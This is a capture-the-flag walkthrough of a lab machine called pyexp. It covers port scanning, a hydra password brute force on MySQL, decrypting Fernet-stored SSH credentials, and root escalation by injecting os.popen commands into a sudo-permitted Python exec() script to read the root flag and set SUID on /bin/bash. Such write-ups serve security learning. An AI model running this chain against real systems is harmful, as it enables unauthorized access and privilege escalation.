IP of the target :- 192.168.1.88
Enumeration and User Shell
As usual I started with nmap scan to find open ports and services running in the target system using the command show below:
nmap -sC -sV -Pn -p- -o nmap.txt -T4 --max-rate=1000 192.168.1.88 # Nmap 7.80 scan initiated Fri Sep 25 15:44:47 2020 as: nmap -sC -sV -Pn -p- -o nmap.txt -T4 --max-rate=1000 192.168.1.88 Nmap scan report for pyexp.lan (192.168.1.88) Host is up (0.00023s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA) | 256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA) |_ 256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519) 3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.23-MariaDB-0+deb10u1 | Thread ID: 41 | Capabilities flags: 6348
This was a strange thing for me because usually HTTP ports are open but here we have only two ports, 1337/SSH and 3306/Mysql. Next thing that came in my mind was to run a brute force attack against user root for mysql.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/pyexp] └──╼ $hydra -l root -P ../../rockyou.txt -t 32 mysql://192.168.1.88 . . . [mysql] host: 192.168.1.88 login: root password: prettywoman
Okay now we have mysql credentials, Login into mysql using the command
mysql -u root -h 192.168.1.88 -p; and after logging into the mysql I found a interesting database using the following command:
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | data | | information_schema | | mysql | | performance_schema | +--------------------+
Inside database data, I found a table with name fernet, dumping all the data of table fernet using the command
select * from fernet;
I thought it is base64 or base32 encoded text but I was wrong, after trying some sql queries I searched about fernet on the internet and found that it some kind of encryption technique and we need a key to decrypt the encrypted text.
Decoded text clearly shows that these are SSH creds.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/pyexp] └──╼ $ssh firstname.lastname@example.org -p 1337 email@example.com's password:
After login into the system through SSH I checked for user privileges and found something interesting
-bash-5.0$ sudo -l Matching Defaults entries for lucy on pyexp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User lucy may run the following commands on pyexp: (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
Then I checked if user lucy can edit the /opt/exp.py but there was only read permission, I read the code and found a interesting python function.
-bash-5.0$ cat /opt/exp.py uinput = raw_input('how are you?') exec(uinput)
I searched about exec() function and found this
But can we execute more commands, I tried to read the root flag but it doesn't worked .
-bash-5.0$ sudo -u root /usr/bin/python2 /opt/exp.py how are you?print(cat /root/root.txt) . . . NameError: name 'cat' is not defined
I started to search more about this and found another thing that will be helpful in reading the root flag for sure .
-bash-5.0$ sudo -u root /usr/bin/python2 /opt/exp.py how are you?**print(import('os').popen('cat /root/root.txt').read())** a7a7e80ff4920ff06f049012700c99a8
And if we want to gain access to root shell then we can do this by making /bin/bash SUID binary like this
print(import('os').popen('chmod u+s /bin/bash').read()) and after this execute the command
/bin/bash -p and we have the root shell.
-bash-5.0$ /bin/bash -p bash-5.0# uname -a ; whoami Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux root bash-5.0#
We have completed the challenge, I Hope you like the walkthrough :)
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Kit8.